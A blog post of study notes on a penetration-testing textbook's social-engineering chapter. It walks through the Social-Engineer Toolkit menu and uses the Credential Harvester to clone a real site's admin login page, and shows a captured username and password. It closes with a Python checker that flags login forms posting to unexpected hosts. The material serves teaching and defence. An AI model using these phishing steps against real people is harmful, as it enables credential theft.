Penetration Testing Practice: Social Engineering

  • 2017-12-25

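These are my notes from reading Chapter 5, "Social Engineering", of 《渗透测试实践指南》.

0. Introduction to SET

SET, the Social-Engineer Toolkit, is a toolkit for social engineering.

Start SET in Kali: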

root@kali:~# setoolkit
 Select from the menu:

   1) Social-Engineering Attacks
       1) Spear-Phishing Attack Vectors
       2) Website Attack Vectors
           1) Java Applet Attack Method
           2) Metasploit Browser Exploit Method
           3) Credential Harvester Attack Method (phishing site)
           4) Tabnabbing Attack Method
           5) Web Jacking Attack Method (web clickjacking)
           6) Multi-Attack Web Method
           7) Full Screen Attack Method
           8) HTA Attack Method (HTML application attack)
       3) Infectious Media Generator (generates a trojan)
       4) Create a Payload and Listener
       5) Mass Mailer Attack
       6) Arduino-Based Attack Vector
       7) Wireless Access Point Attack Vector
       8) QRCode Generator Attack Vector
       9) Powershell Attack Vectors
      10) SMS Spoofing Attack Vector
      11) Third Party Modules
   2) Penetration Testing (Fast-Track)
       1) Microsoft SQL Bruter (Microsoft SQL password brute forcing)
       2) Custom Exploits
       3) SCCM Attack Vector
       4) Dell DRAC/Chassis Default Checker
       5) RID_ENUM - User Enumeration Attack
       6) PSEXEC Powershell Injection
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit (update the software)
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 

1. Building a Phishing Site

Start SET in Kali, then select Social-Engineering Attacks -> Website Attack Vectors -> Credential Harvester Attack Method:

set:webattack>2

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

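Select 2) Site Cloner, then enter the IP address of the host that will receive the submitted data and the URL of the target site to clone.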

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.56.2
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.searchconf.net/admin/

[*] Cloning the website: http://www.searchconf.net/admin/
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.56.3 - - [25/Dec/2017 02:23:36] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: csrfmiddlewaretoken=eMXKzkzYiho9uP9zFiMnUDes0WAmzIne
POSSIBLE USERNAME FIELD FOUND: username=admin
POSSIBLE PASSWORD FIELD FOUND: password=123123
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
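
From the defender's side, the transcript above shows what to look for: the login form is served from, and posts back to, the harvester address rather than the real site. The Python check below is an added example, not part of the original notes or of SET; the function names and the sample page are constructed, and it assumes the clone's form action points at the POST-back IP entered above.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urljoin, urlsplit

class FormCollector(HTMLParser):
    """Record each <form>'s action; inputs count toward the last opened form."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1]["password"] = True

def is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def audit_login_forms(html, page_url, expected_host):
    """Return [(target_url, [reasons])] for password forms with a suspicious target."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not form["password"]:
            continue  # only forms that collect a password are of interest
        # A relative or empty action resolves against the URL the page came from.
        target = urlsplit(urljoin(page_url, form["action"]))
        host = target.hostname or ""
        reasons = []
        if host != expected_host.lower():
            reasons.append("unexpected host")
        if is_ip(host):
            reasons.append("bare IP address")
        if target.scheme != "https":
            reasons.append("no TLS")
        if reasons:
            findings.append((target.geturl(), reasons))
    return findings

# Constructed sample: a cloned login page whose form posts to the lab address
# 192.168.56.2 from the transcript (assumed layout, not captured SET output).
CLONED_PAGE = """<form method="POST" action="http://192.168.56.2/">
<input type="text" name="username"><input type="password" name="password"></form>"""

if __name__ == "__main__":
    print(audit_login_forms(CLONED_PAGE, "http://192.168.56.2/", "www.searchconf.net"))
```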
